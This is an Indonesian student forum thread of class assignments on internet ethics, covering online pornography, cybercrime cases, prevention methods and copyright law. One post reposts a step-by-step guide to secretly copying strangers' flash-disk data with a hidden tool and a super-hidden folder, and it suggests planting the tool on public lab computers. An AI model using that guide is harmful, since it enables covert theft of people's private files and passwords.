Selain mendapat tentangan secara hukum, banyak kalangan meragukan keefektifan pemerintah mengontrol dunia tanpa batas tersebut. Server lokal bisa saja dibungkam, tapi bagaimana dengan yang dari luar wilayah hukum AS? Ini yang menjadi persoalan. Di Asia, langkah positif ini sudah diikuti oleh Singapura. Pemerintah setempat sudah melakukan pembatasan. Provider, perusahaan penyedia jasa layanan internet dibatasi hanya dua buah saja. Mereka juga dikontrol ketat. Bagi mereka yang kepergok menyebarkan pornografi ada ancaman hukuman kurungan dan denda.
Bagaimana di Indonesia? Para penggemar dan penggiat situs porno boleh menarik nafas lega, soalnya pemerintah nampaknya masih adem ayem.
Ancaman pornografi pada anak-anak bukan saja kekhawatiran mereka bakal mengkonsumsi tayangan tersebut, tapi mereka juga bisa menjadi korbannya. Banyak situs porno di internet yang menayangkan pornografi yang dilakukan oleh anak-anak. Baik foto mesum ataupan adegan mesumnya itu sendiri.
Meski usaha keras kepolisian dilakukan, namun menggulung jaringan pornografi anak tidaklah mudah. Wakil Direktur BNCS, Bob Packham, mengakui hal tersebut. Jaringan yang bernama Wonderland itu muncul di AS dan menyebar ke 12 negara di Eropa dan Australia, mereka memiliki sistem yang canggih. Mereka menggunakan kode pengamanan yang dikembangkan dinas rahasia KGB, dalam jaringan komunikasinya. Dahsyat memang!
Selama mental manusia tidak dibenahi dengan akidah yang shahih, maka penghargaan pada sesama manusia tidak akan pernah ada. Yang muncul malah eksploitasi dan saling memeras, termasuk pada anak-anak, kelompok manusia yang paling lemah. Maka, manusia harus jujur bahwa mereka membutuhkan Islam. Satu-satunya ideologi yang menentang eksploitasi terhadap sesama manusia, dan mencintai kelompok yang lemah, khususnya anak-anak.

Sumber : teknologi.kompasiana.com/internet/2010/05/13/sedikit-tentang-dunia-maya-dan-internet

Basketball Basketball

Lihat profil user
AINUL YAQIN
10010849

Basketball Basketball

SEDIKIT TENTANG DUNIA MAYA dan INTERNET


“Pornografi melalui internet”
Di jaman sekarang ini dunia yang satu ini sudah menjadi sangat lumrah dan sangat mudah di akses, baik menggunakan MOBILE maupun PC. Dunia maya,,, ya kita menyebutnya begitu, dunia maya kita bisa mengakses apapun semau kita. Mulai dari kejahatan dunia maya atau sering di sebut dengan “cybercrime” adalah istilah yang mengacu pada aktivitas kejahatan dengan komputer atau jaringan komputer yang menjadi alatnya. Kejahatan dunia maya antara lain adalah penipuan lelang secara Online, pemalsuan CEK, penipuan kartu kredit, confiden fraud, penipuan identitas, dll.
Contoh kejahatan dunia maya di mana komputer sebagai alat adalah spamming dan kejahatan terhadap hak cipta dan kejahatan intelektual.
Contoh kejahatan dunia maya yang lain di mana komputer sebagai sasarannya adalah akses ilegal (mengelabui kontrol akses), malware dan serangan DoS. dan masih banyak kejahatan2 dunia maya yang lain…
Dan tak kalah seru ada yang menyebutnya dengan Perang Jaringan…. nah yang ini silahkan cek sendiri… hehehe
bila masih penasaran silahkan hubungi om googling… ^_^
Di luar tentang kejahatan2 dunia maya banyak manfaat yang dapat di ambil dari dunia maya…
salah satu contohnya adalah akses ke sumber informasi.
Sebelum adanya Internet, masalah utama yang dihadapi oleh pendidikan (di seluruh dunia) adalah akses kepada sumber informasi. Perpustakaan yang konvensional merupakan sumber informasi yang sayangnya tidak murah. Buku-buku dan journal harus dibeli dengan harga mahal. Pengelolaan yang baik juga tidak mudah. Sehingga akibatnya banyak tempat di berbagai lokasi di dunia (termasuk di dunia Barat) yang tidak memiliki perpustakaan yang lengkap. Adanya Internet memungkinkan mengakses kepada sumber informasi yang mulai tersedia banyak. Dengan kata lain, masalah akses semestinya bukan menjadi masalah lagi.
Selain dapat belajar kita juga dapat mencari teman2 lama atau mendapat teman baru, melalui berbagai jejaring sosial, entah itu facebook, friendster, antar blog, maupun berbagai macam forum diskusi yang bertebaran di dunia maya.
Tapi ada yang mengganjal di pikiranku, yaitu mengenai pornografi yang makin menggila. Mungkin ini salah satu sisi kelam dunia internet, yakni hal-hal yang berbau cabul nampaknya makin akrab za dengan anak-anak jaman sekarang di sepanjang tahun ini.
Batas antarnegara pun di terjang. Kini bisa hadir online 24 jam di rumah-rumah kita. internet adalah jalan tembusnya.

Kecanggihan teknologi memang pisau bermata dua. Salah pemanfaatan bukan kebaikan yang datang, tapi marabahaya. Itu juga yang berlaku pada internet. Kemudahan informasi via internet ternyata mengundang hadirnya industri pornografi. Adalah ulah sejumlah kapitalis yang menanamkan investasi di bisnis pornografi dunia maya. Beragam informasi yang bikin gerah banyak orang itu ditawarkan. Mulai dari sekedar menampilkan gambar wanita telanjang hingga adegan-adegan yang menjijikkan dan di luar batas kemanusiaan juga dijajakan; seperti lesbian, homoseksual, pedofilia dan hubungan intim dengan hewan. Tapi apapun komentar banyak orang termasuk kita umat Muslim, erotisme yang ditawarkan via internet telah mendobrak batas-batas penghalang antara publik termasuk remaja dengan para produser pornografi. Kini, orang dewasa dan remaja tidak perlu sembunyi-sembunyi membeli majalah atau VCD porno karena semuanya dapat hadir di warung internet, dan bahkan rumah. Seperti kata Scott Hirsch, pemilik DOMELive salah satu situs porno terbesar di Amrik, “Internet telah memecahkan problem distribusi yang menghadang industri pornografi.”
Ini terlihat dari hasil penelitian vendor keamanan Symantec, yang mengungkap 100 topik pencarian paling populer tahun ini di kalangan anak-anak usia 13-18 tahun.
Memprihatinkan, karena kata kunci seks dan porno ternyata menduduki di tempat salah satu posisi tertinggi dalam daftar tersebut.
Berdasarkan kategori jenis kelamin, topik seks bercokol di tempat keempat pencarian paling populer bagi anak lelaki dan di posisi kelima daftar pencarian anak perempuan.
Anak laki-laki sepertinya lebih tertarik pada hal-hal berbau mesum, karena topik porno bertengger di tempat kelima dalam daftar mereka. Sementara anak perempuan cenderung menggemari subyek seperti musik, acara televisi, film dan selebritis.
Selebritis yang paling banyak dicari adalah Michael Jackson, meski posisinya di luar 10 besar. Seleb seperti Miley Cyrus, Britney Spears, dan Jonas Brothers juga paling banyak diminati.
Seperti detikINET kutip dari Cnet, Senin (21/12/2009), untuk mengkompilasi daftar 100 besar ini, Symantec menganalisis 14,6 juta pencarian yang dilakukan via layanan Online Family Norton.
Berikut adalah salah satu hasil penelitian yang memuat 10 besar topik pencarian di kalangan anak-anak sepanjang 2009:
1. YouTube
2. Facebook
3. Google
4. Sex
5. MySpace
6. Porn
7. Yahoo
8. YouTube.com
9. eBay
10. WIkipedia
Apa kelebihan informasi yang diturunkan internet? Bebas sensor. Bila jaringan televisi dan media cetak harus melalui sensor terlebih dahulu, situs-situs menyajikannya dengan komplit. Detil demi detil perselingkuhan Mr. Bill dan karyawan magang Gedung Putih itu dikupas tuntas. Mulai dari proses perkenalan, tubrukan yang direkayasa, surat-suratan dan telepon-teleponan yang penuh rayuan gombal, hingga sejumlah perzinaan yang dilakukan sang presiden dengan pegawainya tersebut.
Clinton-Lewinsky
Setelah Kongres Amerika menyetujui pembeberan skandal Bill Clinton dan Monica Lewinsky – hasil investigasi Kenneth Starr, 11 September 1997, sontak banyak orang mengalihkan perhatian mereka ke layar monitor. Meng -klik sejumlah situs internet dan membaca laporan setebal 442 halaman. Begitu banyaknya orang yang mengakses internet, membuat mengakses laporan itu tak segampang biasanya.
(saking banyak yang akses kali ya…) ^_^
Itulah yang menyebabkan internet mulai dilirik para pengusaha seks. Mudah dijangkau konsumen.
dan mudah di akses tentunya.
Salah perusahaan penyedia jasa erotisme Internet Video Group (IVG) menceritakan keuntungan yang mereka raup. Pemiliknya, Scott Hirsch, mampu membeli rumah mewah dan Mercedes Benz dalam sekejap. Untuk itu Hirsch mempekerjakan 3 lusin wanita cantik yang sehari-harinya ‘bertugas’ menampilkan kemesuman. Mereka kebanyakan para penari malam yang sudah jenuh bekerja di klab-klab malam. Para ‘artis’ itu bekerja di areal terbuka seluas 22.000 meter persegi di Pompano Beach, yang berfungsi sebagai cyberbroadcast, dilengkapi segala fasilitas termasuk gimnasium untuk menjaga kebugaran para ‘karyawan’. Gedungnya saja senilai US$ 1,6 juta. Tapi biaya besar itu tidak menjadi soal karena Hirsch paham betul seluk beluk bisnis ini. Perhitungan Hirsch benar, dalam tiga bulan perusahaannya sudah meraup keuntungan.
Perusahaan yang dipimpin usahawan contact lens, pernah membuat gebrakan sinting yang menjadi skandal. Mereka promosi akan menayangkan adegan mesum sepasang pemuda bernama Mike dan Diane, yang akan melepas keperawanannya 4 Agustus ‘98 lalu. Para penggila erotisme kontan memburu tayangan tersebut. Ketika rencana itu diumumkan pada pertengahan Juli, dalam sekejap 50.000 orang tercatat bakal masuk situs tersebut. Masing-masing dikenai tarif US$ 5-US$ 8.

Namun tayangan sinting bin ngawur itu keburu terbongkar. Mike ternyata bernama Ty Taylor, 23 tahun, seorang pengangguran dari Alabama. Sedangkan Diane bernama Michelle Parma, asal Texas. Michelle mengaku ia sudah tak gadis lagi. Diduga keduanya melakukanitu untuk publisitas dan duit. Tapi keduanya menyangkal tuduhan tersebut, “Ini untuk pendidikan seks yang sehat,” kata Michelle. Rupanya mereka disponsori Condomania, sebuah perusahaan retail kondom di California. Gila nggak tuh!
Berapa keuntungan bisnis situs porno ini? Cukup susah untuk menghitungnya. Karena begitu banyaknya perusahaan seperti ini tersebar di pelosok bumi. Forrester Research, sebuah jasa konsultasi bidang telekomunikasi di Boston, mengungkapkan bahwa layanan hiburan orang dewasa (adult entertainment) mencapai US$ 50 juta pertahun. Sumber lain mengungkap tahun lalu, situs asusila ini ditaksir mengeruk keuntungan hingga US$ 200 juta, atau 35 % dari US$ 550 juta pendapatan bisnis internet.
Apa yang kini berkecamuk di dunia cyberspace adalah gambaran betapa batas asusila dan susila itu sudah menjadi kabur, bahkan nyaris tidak ada. Itulah kapitalisme. Dengan asas manfaatnya sukses mengecoh manusia untuk menjadi gila harta sekalipun dengan mengorbankan moral dan harga diri. Apa mereka akan hancurnya generasi muda dan juga masyarakat? Pertanyaan seperti itu rasanya percuma dilontarkan pada mereka, tapi lebih tepat ditujukan pada umat Muslim. Agar mereka tidak lagi mengagungkan kapitalisme, demokrasi dan sekulerisme. Toh, sudah terbukti borok-boroknya.

Selamatkan Anak-anak !!!
Tanah air kekhawatiran akan anak-anak mengkonsumsi pornografi???
Di Amerika sudah banyak orang tua yang mengajukan protes pada pemerintah setempat.? Menyadari bahayanya, dua orang senator Amerika, James Exon dari Nebraska dan Dan Coats dari Indiana segera merancang undang-undang untuk membasmi cybersex, yang disebut Communication Decency Act. Dua orang senator ini mengancam akan memasukkan sanksi dendan US$ 100 ribu bagi siapa saja yang membuat gambar porno itu bisa dijangkau anak-anak. Tapi usulan ini mendapat protes keras, terutama karena berlawanan dengan First Amandement, yang, antara lain, melarang Kongres membatasi kebebasan pers, berbicara dan hak mendapat informasi. Itulah ruwetnya demokrasi; selalu mengatasnamakan kebebasan padahal banyak urusan yang membahayakan moral publik, terutama remaja dan anak-anak.
Selain mendapat tentangan secara hukum, banyak kalangan meragukan keefektifan pemerintah mengontrol dunia tanpa batas tersebut. Server lokal bisa saja dibungkam, tapi bagaimana dengan yang dari luar wilayah hukum AS? Ini yang menjadi persoalan. Di Asia, langkah positif ini sudah diikuti oleh Singapura. Pemerintah setempat sudah melakukan pembatasan. Provider, perusahaan penyedia jasa layanan internet dibatasi hanya dua buah saja. Mereka juga dikontrol ketat. Bagi mereka yang kepergok menyebarkan pornografi ada ancaman hukuman kurungan dan denda.
Bagaimana di Indonesia? Para penggemar dan penggiat situs porno boleh menarik nafas lega, soalnya pemerintah nampaknya masih adem ayem.
Ancaman pornografi pada anak-anak bukan saja kekhawatiran mereka bakal mengkonsumsi tayangan tersebut, tapi mereka juga bisa menjadi korbannya. Banyak situs porno di internet yang menayangkan pornografi yang dilakukan oleh anak-anak. Baik foto mesum ataupan adegan mesumnya itu sendiri.
Meski usaha keras kepolisian dilakukan, namun menggulung jaringan pornografi anak tidaklah mudah. Wakil Direktur BNCS, Bob Packham, mengakui hal tersebut. Jaringan yang bernama Wonderland itu muncul di AS dan menyebar ke 12 negara di Eropa dan Australia, mereka memiliki sistem yang canggih. Mereka menggunakan kode pengamanan yang dikembangkan dinas rahasia KGB, dalam jaringan komunikasinya. Dahsyat memang!
Selama mental manusia tidak dibenahi dengan akidah yang shahih, maka penghargaan pada sesama manusia tidak akan pernah ada. Yang muncul malah eksploitasi dan saling memeras, termasuk pada anak-anak, kelompok manusia yang paling lemah. Maka, manusia harus jujur bahwa mereka membutuhkan Islam. Satu-satunya ideologi yang menentang eksploitasi terhadap sesama manusia, dan mencintai kelompok yang lemah, khususnya anak-anak.



Sumber : teknologi.kompasiana.com/internet/2010/05/13/sedikit-tentang-dunia-maya-dan-internet
Sleep Sleep Sleep Sleep Sleep Sleep










Lihat profil user

11 tugas 1 on Thu Apr 12, 2012 9:09 am

Kartika Rukmi
10010870


Contoh Jangan Menggunakan Komputer Untuk Mencuri
## Klik Disini ##:



Mencuri Data-Data Milik Pengguna FLASHDISK


FlashDISK merupakan media penyimpanan portable yang kini makin banyak digunakan oleh para pengguna komputer di Indonesia. Selain harganya yang makin murah, kapasitasnya pun kian besar dengan ukuran fisik yang kian mini dari generasi ke generasi.

Nah, biasanya nich, orang seringkali akan menyimpan data-data sensitifnya di dalam flashdisk. Dan tak jarang, seseorang menyimpan PASSWORD account-accountnya pada suatu file teks yang disimpan dalam FlashDISK.

Anda mengincar target yang demikian? caranya cukup mudah. Alat dan bahan yang perlu anda persiapkan adalah: ThumbsuCK.exe download secara cuma-cuma di jhezer.com/download/

Setelah anda mendownloadnya, copy ThumbSUCK.exe kedalam suatu directory tersembunyi. Misalnya saja anda letakkan di Local Drive D:. Buatlah suatu directory dengan atribut SUPER HIDDEN agar korban tidak curiga. Ikuti panduan berikut:

1. Buatlah directory baru di D: atau dimanapun anda suka. Beri nama terserah anda. Pada contoh ini saya beri nama gudangkorban. Salinlah ThumbSUCK.exe kedalam directory tersebut lalu klik 2X untuk menjalankannnya.

2. Klik Start – Run lalu ketik cmd untuk memanggil Windows Command Processor

3. Kini saatnya menjadikan directory tersebut menjadi super hidden. Gunakan saja perintah attrib dengan format attrib lokasifolder +s +h. Karena nama directory yang tadi dibuat adalah gudangkorban yang terletak di drive D: maka ketik: attrib d:gudangkorban +s +h lalu tekan ENTER.

Selesai sudah.. kini cobalah anda tancapkan sendiri FlashDISK anda. Data-data anda yang berada didalam FlashDISK akan disalin dengan silent mode oleh ThumbSUCK.exe kedalam directory gudangkorban di suatu folder dengan nama sesuai dengan volume label Flashdisk.

Karena directory gudangkorban diberi atribut super hidden, maka hilangkan terlebihdahulu tanda centang pada opsi Hide Protected Operating System Files (Recomended) dan beri centang pada Show Hidden Files and Folders di Folder Options (Tools -> Folder Options pada Windows Explorer).

Untuk mendisable aplikasi ini, gunakan Windows TaskManager (CTRL-ALT-DELETE) atau gunakan saja TaskMANAGER kesayangan anda.

Bagaimana jika ditanam di komputer public? atau ditanam di lab-lab kampus? Hmm.. dengan sedikit beramain-main Registry, anda dapat membuat aplikasi ini otomatis berjalan ketika windows startup Very Happy hehehe.. tentunya anda bisa panen data pribadi orang lain


Sumber :: jhezer.com/mencuri-data-data-milik-pengguna-flashdisk/



Terakhir diubah oleh kartika rukmi tanggal Mon Apr 16, 2012 8:58 am, total 1 kali diubah

Lihat profil user

12 tugas the ten coce on Thu Apr 12, 2012 6:24 pm

DIAN APSARI SETYANINGSIH
10010857

KOMPUTER DIGUNAKAN UNTUK MENCURI

"KLIK DISINI" bounce bounce lol! :
Contoh kasus cybercrime di Indonesia

Pencurian dan penggunaan account Internet milik orang lain . Salah satu kesulitan dari sebuah ISP (Internet Service Provider) adalah adanya account pelanggan mereka yang “dicuri” dan digunakan secara tidak sah. Berbeda dengan pencurian yang dilakukan secara fisik, “pencurian” account cukup menangkap “userid” dan “password” saja. Hanya informasi yang dicuri. Sementara itu orang yang kecurian tidak merasakan hilangnya “benda” yang dicuri. Pencurian baru terasa efeknya jika informasi ini digunakan oleh yang tidak berhak. Akibat dari pencurian ini, penggunan dibebani biaya penggunaan acocunt tersebut. Kasus ini banyak terjadi di ISP. Namun yang pernah diangkat adalah penggunaan account curian oleh dua Warnet di Bandung.

Membajak situs web . Salah satu kegiatan yang sering dilakukan oleh cracker adalah mengubah halaman web, yang dikenal dengan istilah deface. Pembajakan dapat dilakukan dengan mengeksploitasi lubang keamanan. Sekitar 4 bulan yang lalu, statistik di Indonesia menunjukkan satu (1) situs web dibajak setiap harinya. Hukum apa yang dapat digunakan untuk menjerat cracker ini?

Probing dan port scanning . Salah satu langkah yang dilakukan cracker sebelum masuk ke server yang ditargetkan adalah melakukan pengintaian. Cara yang dilakukan adalah dengan melakukan “port scanning” atau “probing” untuk melihat servis-servis apa saja yang tersedia di server target. Sebagai contoh, hasil scanning dapat menunjukkan bahwa server target menjalankan program web server Apache, mail server Sendmail, dan seterusnya. Analogi hal ini dengan dunia nyata adalah dengan melihat-lihat apakah pintu rumah anda terkunci, merek kunci yang digunakan, jendela mana yang terbuka, apakah pagar terkunci (menggunakan firewall atau tidak) dan seterusnya. Yang bersangkutan memang belum melakukan kegiatan pencurian atau penyerangan, akan tetapi kegiatan yang dilakukan sudah mencurigakan. Apakah hal ini dapat ditolerir (dikatakan sebagai tidak bersahabat atau unfriendly saja) ataukah sudah dalam batas yang tidak dapat dibenarkan sehingga dapat dianggap sebagai kejahatan?

Berbagai program yang digunakan untuk melakukan probing atau portscanning ini dapat diperoleh secara gratis di Internet. Salah satu program yang paling populer adalah “nmap” (untuk sistem yang berbasis UNIX, Linux) dan “Superscan” (untuk sistem yang berbasis Microsoft Windows). Selain mengidentifikasi port, nmap juga bahkan dapat mengidentifikasi jenis operating system yang digunakan.

Virus . Seperti halnya di tempat lain, virus komputer pun menyebar di Indonesia . Penyebaran umumnya dilakukan dengan menggunakan email. Seringkali orang yang sistem emailnya terkena virus tidak sadar akan hal ini. Virus ini kemudian dikirimkan ke tempat lain melalui emailnya. Kasus virus ini sudah cukup banyak seperti virus Mellisa, I love you, dan SirCam. Untuk orang yang terkena virus, kemungkinan tidak banyak yang dapat kita lakukan. Akan tetapi, bagaimana jika ada orang Indonesia yang membuat virus (seperti kasus di Filipina)? Apakah diperbolehkan membuat virus komputer?

Denial of Service (DoS) dan Distributed DoS (DDos) attack . DoS attack merupakan serangan yang bertujuan untuk melumpuhkan target (hang, crash) sehingga dia tidak dapat memberikan layanan. Serangan ini tidak melakukan pencurian, penyadapan, ataupun pemalsuan data. Akan tetapi dengan hilangnya layanan maka target tidak dapat memberikan servis sehingga ada kerugian finansial. Bagaimana status dari DoS attack ini? Bayangkan bila seseorang dapat membuat ATM bank menjadi tidak berfungsi. Akibatnya nasabah bank tidak dapat melakukan transaksi dan bank (serta nasabah) dapat mengalami kerugian finansial. DoS attack dapat ditujukan kepada server (komputer) dan juga dapat ditargetkan kepada jaringan (menghabiskan bandwidth). Tools untuk melakukan hal ini banyak tersebar di Internet. DDoS attack meningkatkan serangan ini dengan melakukannya dari berberapa (puluhan, ratusan, dan bahkan ribuan) komputer secara serentak. Efek yang dihasilkan lebih dahsyat dari DoS attack saja.

Kejahatan yang berhubungan dengan nama domain . Nama domain (domain name) digunakan untuk mengidentifikasi perusahaan dan merek dagang. Namun banyak orang yang mencoba menarik keuntungan dengan mendaftarkan domain nama perusahaan orang lain dan kemudian berusaha menjualnya dengan harga yang lebih mahal. Pekerjaan ini mirip dengan calo karcis. Istilah yang sering digunakan adalah cybersquatting. Masalah lain adalah menggunakan nama domain saingan perusahaan untuk merugikan perusahaan lain. (Kasus: mustika-ratu.com) Kejahatan lain yang berhubungan dengan nama domain adalah membuat “domain plesetan”, yaitu domain yang mirip dengan nama domain orang lain. (Seperti kasus klikbca.com) Istilah yang digunakan saat ini adalah typosquatting.

IDCERT ( Indonesia Computer Emergency Response Team). Salah satu cara untuk mempermudah penanganan masalah keamanan adalah dengan membuat sebuah unit untuk melaporkan kasus keamanan. Masalah keamanan ini di luar negeri mulai dikenali dengan munculnya “sendmail worm” (sekitar tahun 1988) yang menghentikan sistem email Internet kala itu. Kemudian dibentuk sebuah Computer Emergency Response Team (CERT). Semenjak itu di negara lain mulai juga dibentuk CERT untuk menjadi point of contact bagi orang untuk melaporkan masalah kemanan. IDCERT merupakan CERT Indonesia .

Sertifikasi perangkat security . Perangkat yang digunakan untuk menanggulangi keamanan semestinya memiliki peringkat kualitas. Perangkat yang digunakan untuk keperluan pribadi tentunya berbeda dengan perangkat yang digunakan untuk keperluan militer. Namun sampai saat ini belum ada institusi yang menangani masalah evaluasi perangkat keamanan di Indonesia. Di Korea hal ini ditangani oleh Korea Information Security Agency.



Source :

1. keamananinternet.tripod.com/pengertian-definisi-cybercrime

2. hitamputih666.wordpress.com/2009/04/14/modus-modus-kejahatan-dalam-teknologi-informasi/
[/sub]
[/size]

Lihat profil user

13 CARA-CARA UNTUK MENCEGAH KEJAHATAN KOMPUTER on Fri Apr 13, 2012 9:56 am

CARA-CARA UNTUK MENCEGAH KEJAHATAN KOMPUTER :
Very Happy Very Happy Very Happy
oleh Budiyanto (10010853)

Teknologi informasi sangat berkembang sedemikian cepat, tetapi perkembangan ini diikuti pula dengan kejahatan teknologi informasi. Dan karena kejahatan ini pula menyebabkan banyak orang harus membayar mahal untuk mencegahnya dan menaati hukum yang ada. Berdasarkan dari sumber yang saya dapatkan ada beberapa cara yang dapat kita gunakan untuk mencegah kejahatan komputer, yaitu sbb :
1. Memperkuat hukum
Kini dengan hukum dunia teknologi informasi diperkuat maka setiap orang tidak seenaknya lagi melannggar hukum, karena bisa-bisa digiring sampai ke kantor polisi. Organisasi industri seperti Software Publishers Association (SPA) segera dibentuk setelah maraknya pembajakan perangakat
lunak dalam sekala besar maupun kecil. (Pembajakan perangkat lunak komersial sekarang merupakan tindak pidana berat, bisa dienjara maksimal 5 tahun dan didenda hingga 250.000 dollar bagi siapa saja yang terbukti memakai peragkat bajakan). Dengan memperkuat hukum ini minimal akan mengurangi resiko kejahatan Teknologi informasi.
2. CERT : Computer Emergency respose Team
Pada tahun 1988, setelah internet tersebar luas, Departemen pertahanan AS membentuk CERT. Meskipun lembaga ini tidak mempunyai wewenang untuk menahan atau mengadili, CERT menyediakan informasi internasional dan layanan seputar keamanan bagi para pengguna internet. CERT hadr sebagai
pendamping pihak yang diserang, membantu mengatasi penggangu, dan mengevaluasi sistem yang telah megalami serangan untuk melindunginya dari gangguan dimasa yang akan datang.
3. Alat pendeteksi kecurangan perangkat lunak deteksi berbasis aturan. Dalam teknik ini pengguna, semisal pedagang membuat file negatif yang memuat kriteria yang harus dipenuhi oleh setiap transaksi. Kriteria ini meliputi nomor kartu kredit yang dicuri dan juga batas harganya, kecocokan alamat rekening pemegang kartu dan alamat pengiriman, dan peringatan jika satu item dipesan dalam jumlah besar.

Perangkat Lunak Model Prediktif-Statistik
Dalam teknik ini dilakukan pemeriksaan pada berton-ton data dari transaksi sebelumnya. Tujuannya untuk membuat diskripsi matematis tentang kecurangan transaksi yang biasa terjadi. Perangkat lunak ini menghitung pesanan yang masuk menurut skala rasio yang didasarkan pada kemiripan profil
kecurangan. Semisal jika beberapa pencuri yang telah mendapatkan nomor telpon perusahaan anda dengan cara menyadap pembicaraan - melakukan pembicaraan kesuatu negara padahal anda tidak pernah melakukannya, maka perangkat lunak AT&T akan melakukan aktivitas yang tidak biasa lalu
memanggil anda untuk mengetahui apakah anda yang melakukan panggilan tersebut.

Perangkat Lunak Manajemen Internet Pegawai (EIM)
Program yang dibuat oleh Websense, SurfControl, dan Smartfilter yang digunakan untuk memantau berapa banyak waktu yang dihabiskan para manusia yg diweb dan untuk memblokir akses ke situs judi atau porno perangkat lunak penyaring Internet

Beberapa perusahaan menggunakan perangkat lunak penyaring filter khusus untuk memblok akses ke pornogafi, download music bootleg, dan situs Internet lain yang tidak dikehendaki yang kemungkinan akan diakses pengawasan secara elektronik perusahaan menggunakan berbagai jenis pengawas elektronik yang menyertakan teknologi pemantau audio dan visual, membaca email dan blog, dan merekam keystroke.

Dengan berbagai cara pencegahan diatas memang akan mengurangi kejahatan di dunia maya, namun semuanya itu kembali kepada kita sebagai pengguna Teknologi Informasi, selama kita semua masih memakai cara-cara dan etika yang benar pasti perkembangan IT akan terus melaju secara positf. Dan sampai sekarang metode pencegahan masih terus dikembangkan dengan beraneka ragam dan akan terus berkembang sesuai dengan tingkat perkembangan Teknologi Informasi.

^Smoga BermanFaat^
[/color][/color]

Lihat profil user

14 Undang Undang HAKI bidang TIK on Sun Apr 15, 2012 11:33 am

Bagian Pertama
Fungsi dan Sifat Hak Cipta
Pasal 2
(1) Hak Cipta merupakan hak eksklusif bagi Pencipta atau Pemegang Hak Cipta untuk mengumumkan atau memperbanyak Ciptaannya, yang timbul secara otomatis setelah suatu ciptaan dilahirkan tanpa mengurangi pembatasan menurut peraturan perundang¬undangan yang berlaku.
(2) Pencipta dan/atau Pemegang Hak Cipta atas karya sinematografi dan Program Komputer memiliki hak untuk memberikan izin atau melarang orang lain yang tanpa persetujuannya menyewakan Ciptaan tersebut untuk kepentingan yang bersifat komersial.

Bagian Keempat
Ciptaan yang Dilindungi
Pasal 12
(1) Dalam Undang-undang ini Ciptaan yang dilindungi adalah Ciptaan dalam bidang ilmu pengetahuan, seni, dan sastra, yang mencakup:
a. buku, Program Komputer, pamflet, perwajahan (lay out) karya tulis yang diterbitkan, dan semua hasil karya tulis lain;
b. ceramah, kuliah, pidato, dan Ciptaan lain yang sejenis dengan itu;
c. alat peraga yang dibuat untuk kepentingan pendidikan dan ilmu pengetahuan; d. lagu atau musik dengan atau tanpa teks;
e. drama atau drama musikal, tari, koreografi, pewayangan, dan pantomim;
f. seni rupa dalam segala bentuk seperti seni lukis, gambar, seni ukir, seni kaligrafi, seni pahat, seni patung, kolase, dan seni terapan;
g. arsitektur;
h peta
i. seni batik;
j. photografi
k. sinematografi
l. terjemahan, tafsir, saduran, bunga rampai, database, dan karya lain dari hasil pengaliwujudan.
Bagian Kelima
Pembatasan Hak Cipta
Pasal 14
Tidak dianggap sebagai pelanggaran Hak Cipta:
a. Pengumuman dan/atau Perbanyakan lambang Negara dan lagu kebangsaan menurut sifatnya yang asli;
b. Pengumuman dan/atau Perbanyakan segala sesuatu yang diumumkan dan/atau diperbanyak oleh atau atas nama Pemerintah, kecuali apabila Hak Cipta itu dinyatakan dilindungi, baik dengan peraturan perundang-undangan maupun dengan pernyataan pada Ciptaan itu sendiri atau ketika Ciptaan itu diumumkan dan/atau diperbanyak; atau
c. Pengambilan berita aktual baik seluruhnya maupun sebagian dari kantor berita, Lembaga Penyiaran, dan surat kabar atau sumber sejenis lain, dengan ketentuan sumbernya harus disebutkan secara lengkap.
Pasal 15
Dengan syarat bahwa sumbernya harus disebutkan atau dicantumkan, tidak dianggap sebagai pelanggaran Hak Cipta:
a. penggunaan Ciptaan pihak lain untuk kepentingan pendidikan, penelitian, penulisan karya ilmiah, penyusunan laporan, penulisan kritik atau tinjauan suatu masalah dengan tidak merugikan kepentingan yang wajar dari Pencipta;
b. pengambilan Ciptaan pihak lain, baik seluruhnya maupun sebagian, guna keperluan pembelaan di dalam atau di luar Pengadilan;
c. pengambilan Ciptaan pihak lain, baik seluruhnya maupun sebagian, guna keperluan:
(i) ceramah yang semata-mata untuk tujuan pendidikan dan ilmu pengetahuan; atau
(ii) pertunjukan atau pementasan yang tidak dipungut bayaran dengan ketentuan tidak merugikan kepentingan yang wajar dari Pencipta.
d. Perbanyakan suatu Ciptaan bidang ilmu pengetahuan, seni, dan sastra dalam huruf braille guna keperluan para tunanetra, kecuali jika Perbanyakan itu bersifat komersial;
e. Perbanyakan suatu Ciptaan selain Program Komputer, secara terbatas dengan cara atau alat apa pun atau proses yang serupa oleh perpustakaan umum, lembaga ilmu pengetahuan atau pendidikan, dan pusat dokumentasi yang nonkomersial semata-mata untuk keperluan aktivitasnya;
f. perubahan yang dilakukan berdasarkan pertimbangan pelaksanaan teknis atas karya arsitektur, seperti Ciptaan bangunan;
g. pembuatan salinan cadangan suatu Program Komputer oleh pemilik Program Komputer yang dilakukan semata-mata untuk digunakan sendiri.
Pasal 16
(1) Untuk kepentingan pendidikan, ilmu pengetahuan, serta kegiatan penelitian dan pengembangan, terhadap Ciptaan dalam bidang ilmu pengetahuan dan sastra, Menteri setelah mendengar pertimbangan Dewan Hak Cipta dapat:
a. mewajibkan Pemegang Hak Cipta untuk melaksanakan sendiri penerjemahan dan/atau Perbanyakan Ciptaan tersebut di wilayah Negara Republik Indonesia dalam waktu yang ditentukan;
b. mewajibkan Pemegang Hak Cipta yang bersangkutan untuk memberikan izin kepada pihak lain untuk menerjemahkan dan/atau memperbanyak Ciptaan tersebut di wilayah Negara Republik Indonesia dalam waktu yang ditentukan dalam hal Pemegang Hak Cipta yang bersangkutan tidak melaksanakan sendiri atau melaksanakan sendiri kewajiban sebagaimana dimaksud dalam huruf a;
c. menunjuk pihak lain untuk melakukan penerjemahan dan/atau Perbanyakan Ciptaan tersebut dalam hal Pemegang Hak Cipta tidak melaksanakan kewajiban sebagaimana dimaksud dalam huruf b.
(2) Kewajiban untuk menerjemahkan sebagaimana dimaksud pada ayat (1), dilaksanakan setelah lewat jangka waktu 3 (tiga) tahun sejak diterbitkannya Ciptaan di bidang ilmu pengetahuan dan sastra selama karya tersebut belum pernah diterjemahkan ke dalam bahasa Indonesia.
(3) Kewajiban untuk memperbanyak sebagaimana dimaksud pada ayat (1), dilaksanakan setelah lewat jangka waktu:
a. 3 (tiga) tahun sejak diterbitkannya buku di bidang matematika dan ilmu pengetahuan alam dan buku itu belum pernah diperbanyak di wilayah Negara Republik Indonesia
b. 5 (lima) tahun sejak diterbitkannya buku di bidang ilmu sosial dan buku itu belum pernah diperbanyak di wilayah Negara Republik Indonesia;
